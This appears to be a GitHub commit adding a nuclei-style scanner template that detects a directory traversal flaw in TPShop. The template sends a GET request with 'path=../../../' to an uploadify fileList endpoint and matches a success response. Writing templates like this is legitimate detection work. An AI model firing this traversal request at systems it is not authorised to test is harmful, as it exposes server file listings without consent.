Create tpshop-directory-traversal.yaml

patch-1
PikPikcU 2021-03-21 02:53:52 +00:00 committed by GitHub
parent ea0f3a2f48
commit ce51bfee06
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: tpshop-directory-traversal
info:
name: Tpshop Directory Traversal
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
tags: tpshop
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"
matchers-condition: and
matchers:
- type: word
words:
- '"state":"SUCCESS"'
condition: and
- type: status
status:
- 200